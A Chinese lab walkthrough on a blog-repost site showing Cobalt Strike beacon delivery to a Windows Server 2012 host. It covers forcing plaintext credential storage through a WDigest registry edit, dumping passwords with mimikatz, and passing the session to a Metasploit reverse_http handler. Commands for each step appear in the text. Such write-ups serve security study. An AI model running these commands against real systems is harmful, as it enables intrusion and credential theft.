码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • cs与msf权限传递,mimikatz抓取win2012明文密码


    目录

    一、启动CS服务端

    二、启动CS客户端

    1、查看客户端的启动名称

    2、启动客户端

    3、这里只用修改密码,然后登录即可。

    三、创建监听器

    1、点击监听器

    2、增加监听器,写下名称,修改端口,其他默认即可

    四、生成脚本文件

    1、点击WindowsExecutable(s)

    2、选择刚才创建好的监听器,勾选x64,其他默认即可,然后点击Generate

    3、选择存放路径

    五、开启http服务,让Win2012直接下载

    1、启动http服务

    2、打开Win2012浏览器进行下载,下载完成后,点击运行

    3、在cs客户端内,查看是否运行成功

    六、获得Win2012的控制权

    1、右键点击进入beacon

    七、抓取明文密码

    1、修改注册表,让win2012息屏,输入密码。

    2、运行mimikatz,抓取明文密码

    八、cs权限传递给msf

    1、启动msf

    2、在cs创建监听器

    3、点击增加会话,选择刚才创建的msf监听器

    4、查看msf是否上线


    一、启动CS服务端

    1. ./teamserver 192.168.208.128 123456
    2. IP地址 密码

    二、启动CS客户端

    1、查看客户端的启动名称

    2、启动客户端

    ./cs.sh

    3、这里只用修改密码,然后登录即可。

    三、创建监听器

    1、点击监听器

    2、增加监听器,写下名称,修改端口,其他默认即可

    四、生成脚本文件

    1、点击WindowsExecutable(s)

    2、选择刚才创建好的监听器,勾选x64,其他默认即可,然后点击Generate

    3、选择存放路径

    五、开启http服务,让Win2012直接下载

    注:这里的实验,我是当win2012已经被拿下,来进行实验

    1、启动http服务

    注:启动http服务时,要在保存脚本的文件夹下启动,若不是,则win2012无法下载;win2012关闭防火墙,否则也无法下载。

    python3 -m http.server 9999

    2、打开Win2012浏览器进行下载,下载完成后,点击运行

    3、在cs客户端内,查看是否运行成功

    注:这里显示两次,是因为运行点了两次。正常只有一次就行。

    六、获得Win2012的控制权

    1、右键点击进入beacon

    1. sleep 0 //正常cs有个命令沉睡,这里是关闭cs的命令沉睡
    2. shell ipconfig //查看win2012的IP地址

    七、抓取明文密码

    1、修改注册表,让win2012息屏,输入密码。

    shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

    原理:

    windows输入密码的进程是winlogon.exe,然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中,ntlmv2加密后发一份给sma文件,mimikatz就抓内存中的明文。

    由于微软将windows补丁之后,就导致windows将不会再把明文存储在内存中,这就代表使用mimikatz将无法再抓取到明文密码

    要想抓取到明文密码我可以通过修改注册表中的数据

    2、运行mimikatz,抓取明文密码

    八、cs权限传递给msf

    1、启动msf

    1. msfconsole
    2. use exploit/multi/handler
    3. set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的监听器一致)
    4. set lhost 本机ip
    5. set lport 自己的端口号
    6. run

    2、在cs创建监听器

    3、点击增加会话,选择刚才创建的msf监听器

    注:这里选之前操作的会话,权限才能传递成功,否则可能会失败。

    4、查看msf是否上线

  • 相关阅读:
    【引语练习题】一般疑问句转化为间接引语
    7.9 混合背包问题7.10 特殊要求7.11 背包问题的搜索解法
    10.10作业
    代码随想录day46 | 动态规划P8 | ● 139. ● 多重背包● 背包问题总结
    [汇编语言]更灵活的定位内存地址的方法
    如何快速开发一个健康助手,实时守护用户健康
    【论文阅读】RadHAR:通过毫米波雷达生成的点云识别人类活动
    JVM - 运行时数据区与线程
    gorm的mysql保存数据保存主键冲突Duplicate entry for key PRIMARY
    【剑指offer48:字符串的排列(下一次排列的进阶版本)】
  • 原文地址:https://blog.csdn.net/qq_64951792/article/details/140003301
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号